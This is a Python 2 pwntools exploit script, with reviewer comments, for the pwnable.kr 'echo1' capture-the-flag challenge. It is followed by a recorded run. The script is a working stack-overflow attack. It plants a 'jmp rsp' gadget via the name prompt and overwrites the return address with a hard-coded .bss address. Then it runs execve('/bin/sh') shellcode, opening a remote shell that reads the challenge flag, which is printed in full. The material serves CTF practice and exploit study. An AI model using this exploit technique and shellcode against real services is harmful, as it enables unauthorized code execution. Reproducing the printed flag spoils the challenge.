#@Windcarp 2015.07.23
from pwn import *
# NOTE(review): this is a Python 2 script (print statement, raw_input(),
# str-based byte-escape concatenation); it does not run unchanged on Python 3.
#init
context(arch = 'amd64', os = 'linux')
# Target selection: a local copy of the binary or the remote service.
# `libc` and `binary` are loaded but never referenced again in this file;
# the ELF() calls only produce the checksec-style summary seen in the
# recorded run (no canary, NX disabled, no PIE) -- each of those hardening
# features, if enabled, would have blocked this class of bug.
local=False
if local:
    p = process("./echo1")
    libc = ELF("/lib/x86_64-linux-gnu/libc-2.19.so")
else:
    p = remote("pwnable.kr", 9010)
binary = ELF("echo1")
# Blocks until Enter is pressed before any traffic is sent; presumably a
# pause for attaching a debugger -- not stated in the file.
raw_input()
#address
# Padding length written before the saved return address is reached.
# Hard-coded and unchecked: it must match the target's exact stack frame.
len_to_ret = 0x28
# Fixed address packed as 8 little-endian bytes. Hard-coding an address is
# only viable because the binary is not PIE (see recorded output).
ret_addr_str = p64(0x6020a0)
# Two-byte `jmp rsp`; the recorded run shows it echoed back as \xff\xe4.
jmpesp_str = asm('jmp rsp')
#payload
# Opaque machine-code bytes. The recorded repr shows the embedded "/bin/sh"
# and "-c" strings; no disassembly is on the page, so nothing further about
# its behaviour is documented here.
buf = ""
buf += "\x6a\x3b\x58\x99\x48\xbb\x2f\x62\x69\x6e\x2f\x73\x68"
buf += "\x00\x53\x48\x89\xe7\x68\x2d\x63\x00\x00\x48\x89\xe6"
buf += "\x52\xe8\x08\x00\x00\x00\x2f\x62\x69\x6e\x2f\x73\x68"
buf += "\x00\x56\x57\x48\x89\xe6\x0f\x05"
# Layout: padding | packed address | code bytes. The input is sent with no
# length check against what the service accepts (the service itself does
# no bounds check either -- that is the defect being demonstrated).
payload = 'a'*len_to_ret
payload += ret_addr_str
payload += buf
print repr(payload)
#first step
#attention to fit the program well
# The prompt/response sequence must match the service's menu exactly
# (recorded run: name prompt ending in ':', menu ending in '>', then one
# line per echo). Each recvuntil blocks until its delimiter arrives, so a
# changed prompt hangs the script rather than failing fast.
print repr(p.recvuntil(':'))
p.send(jmpesp_str + '\n')          # name prompt
print repr(p.recvuntil('>'))
p.send('1' + '\n')                 # menu option 1 ("BOF echo" in the recorded menu)
print repr(p.recvuntil('\n'))
p.send(payload + '\n')             # the oversized echo input
print repr(p.recvuntil('\n'))
#yeah!We got the shell!
# Hands the connection over to the terminal; the recorded run shows the
# remote prompt from this point on.
p.interactive()
python exploit.py
[+] Opening connection to pwnable.kr on port 9010: Done
[*] '/home/windcarp/\xe6\xa1\x8c\xe9\x9d\xa2/pwn/Lesson 4 pwn.kr \xe6\x8f\x90\xe9\xab\x98/echo1/echo1'
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX disabled
PIE: No PIE
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xa0 `\x00\x00\x00\x00\x00j;X\x99H\xbb/bin/sh\x00SH\x89\xe7h-c\x00\x00H\x89\xe6R\xe8\x08\x00\x00\x00/bin/sh\x00VWH\x89\xe6\x0f\x05'
"hey, what's your name? :"
' \n- select echo type -\n- 1. : BOF echo\n- 2. : FSB echo\n- 3. : UAF echo\n- 4. : exit\n>'
' hello \xff\xe4\n'
'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\xa0 `\n'
[*] Switching to interactive mode
goodbye \xff
$ ls
echo1
flag
log
super.pl
$ cat flag
H4d_som3_fun_w1th_ech0_ov3rfl0w
$
#奇怪的bss段id参数的使用  (translation: "the odd use of the `id` parameter in the .bss segment")